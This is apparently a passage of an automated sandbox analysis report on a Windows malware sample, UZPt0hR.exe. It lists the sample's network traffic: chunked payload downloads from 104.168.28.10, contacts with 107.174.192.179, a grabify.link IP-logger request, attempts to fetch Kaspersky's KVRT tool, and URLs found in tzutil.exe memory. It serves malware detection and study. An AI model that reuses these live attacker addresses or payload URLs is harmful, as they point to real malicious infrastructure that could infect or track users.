                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1703936-1835007User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1835008-1966079User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1966080-2228223User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2228224-2490367User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2490368-2752511User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2752512-3014655User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3014656-3276799User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3276800-3538943User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3538944-3801087User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3801088-4325375User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4325376-4849663User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4849664-5373951User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5373952-5606383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.174.192.179
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_00420720 recv,0_2_00420720
                    Source: global trafficHTTP traffic detected: GET /ZATFQO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: grabify.link
                    Source: global trafficHTTP traffic detected: GET /images/pixel.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: grabify.linkCookie: g_session=eyJpdiI6Ijk5TXlFYUU4eFVRM0hHWWVUeUVRd2c9PSIsInZhbHVlIjoiUVV0MkhFWDNKUGEweHNISFFtanBHSkN3NTB0ejkzRWwyRFZLcTRUUW0yQ3M4N09mbWlXTnVDRGhtUy9uUlBWbWdNeHQ1aVdhcmdlZTQ5U1RWWUxKZ3QwV2ZBNkNVVUlweUZQR2F2a2VxMXVMZ083K0F6NXF0dnNMcis2Y3FIUWoiLCJtYWMiOiI5M2EzOGFjYTA4OTM0ODgyN2VmMTgyOTcwMmM4NTJkODZkNzc3YzY3MjNhZDQ3NGVmNjliODg1ZDI0ZGFhMmJhIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IlJvSE93YVV1ZlFJcTBIMENXc0pYOEE9PSIsInZhbHVlIjoia0tWUHlIQndYMG14VndnT1hlVmNLbVhLTitSQ2J5RFJIZ1RxYkNrUFVLcWdJSFFBczMxeXpRYk01NEk4cTBFN3JEVmJ1WWc1enY0NHl6SERrSXhBbUtEYmgvWGJTSC90SmdEZVRlYUR1VkJQV0lCS3BSUFdiU0MzeUdGZzViRjkiLCJtYWMiOiI1YWJhMmFmMjRmNTZmYTgwZWRiZWJmNWU3OGJkMjA5YjFhMzk2OTY0OTJmNDgwNzllYzVjZDE3MjdkM2Q1MGM4IiwidGFnIjoiIn0%3D
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /data/003 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: 107.174.192.179
                    Source: global trafficHTTP traffic detected: GET /clean HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: 107.174.192.179
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=0-16383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=16384-32767User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=32768-49151User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=49152-65535User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=81920-98303User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=98304-114687User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=114688-131071User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=65536-81919User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=131072-163839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=163840-196607User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=196608-229375User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=229376-262143User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=262144-294911User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=294912-327679User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=327680-360447User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=360448-393215User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=393216-458751User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=458752-524287User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=524288-589823User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=589824-655359User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=655360-720895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=720896-786431User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=786432-851967User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=851968-917503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=917504-1048575User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1048576-1179647User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1179648-1310719User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1310720-1441791User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1441792-1572863User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1572864-1703935User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1703936-1835007User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1835008-1966079User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1966080-2228223User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2228224-2490367User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2490368-2752511User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2752512-3014655User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3014656-3276799User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3276800-3538943User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3538944-3801087User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3801088-4325375User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4325376-4849663User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4849664-5373951User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5373952-5606383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficDNS traffic detected: DNS query: grabify.link
                    Source: global trafficDNS traffic detected: DNS query: devbuilds.s.kaspersky-labs.com
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 06 Apr 2025 11:44:29 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467f2691d7515eeefacb5ea82; domain=.kaspersky-labs.com; path=/; expires=Mon, 06-Apr-2026 11:44:29 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 06 Apr 2025 11:44:30 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467f2691e7515eef0acb3ddc0; domain=.kaspersky-labs.com; path=/; expires=Mon, 06-Apr-2026 11:44:30 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 06 Apr 2025 11:44:30 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467f2691e7515eef2acbd8437; domain=.kaspersky-labs.com; path=/; expires=Mon, 06-Apr-2026 11:44:30 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 06 Apr 2025 11:44:30 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467f2691e7515eef4acb94929; domain=.kaspersky-labs.com; path=/; expires=Mon, 06-Apr-2026 11:44:30 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 06 Apr 2025 11:44:31 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467f2691f7515eee6acb35855; domain=.kaspersky-labs.com; path=/; expires=Mon, 06-Apr-2026 11:44:31 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 06 Apr 2025 11:44:32 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467f269207515eee9acb7edfd; domain=.kaspersky-labs.com; path=/; expires=Mon, 06-Apr-2026 11:44:32 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 06 Apr 2025 11:44:32 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467f269207515eeebacbb4210; domain=.kaspersky-labs.com; path=/; expires=Mon, 06-Apr-2026 11:44:32 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 06 Apr 2025 11:44:33 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467f269217515eeedacb31582; domain=.kaspersky-labs.com; path=/; expires=Mon, 06-Apr-2026 11:44:33 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 06 Apr 2025 11:44:33 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467f269217515eeeeacb311f5; domain=.kaspersky-labs.com; path=/; expires=Mon, 06-Apr-2026 11:44:33 GMT; HttpOnly
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 06 Apr 2025 11:44:34 GMTContent-Length: 353Connection: closeCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: klid=39881c0467f269227515eef0acb3f45c; domain=.kaspersky-labs.com; path=/; expires=Mon, 06-Apr-2026 11:44:34 GMT; HttpOnly
                    Source: tzutil.exe, 0000000F.00000003.1448981959.00000000026FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1
                    Source: tzutil.exe, 0000000F.00000003.1446517407.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1461232145.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1446231451.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000002.1476752101.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1450802419.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1449027111.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1448981959.00000000026FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1B
                    Source: tzutil.exe, 0000000F.00000003.1446517407.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1461232145.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1446231451.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000002.1476752101.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1450802419.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1449027111.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1448981959.00000000026FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1D
                    Source: tzutil.exe, 0000000F.00000002.1476688498.00000000026D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1GMT
                    Source: tzutil.exe, 0000000F.00000003.1446517407.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1461232145.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1446231451.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000002.1476752101.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1450802419.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1449027111.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1448981959.00000000026FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1I
                    Source: tzutil.exe, 0000000F.00000003.1446517407.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1461232145.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1446231451.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000002.1476752101.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1450802419.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1449027111.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1448981959.00000000026FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1N
                    Source: tzutil.exe, 0000000F.00000003.1446517407.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1461232145.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1446231451.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000002.1476752101.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1450802419.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1449027111.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1448981959.00000000026FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1P
                    Source: tzutil.exe, 0000000F.00000002.1476622096.0000000002383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1PCUSERD
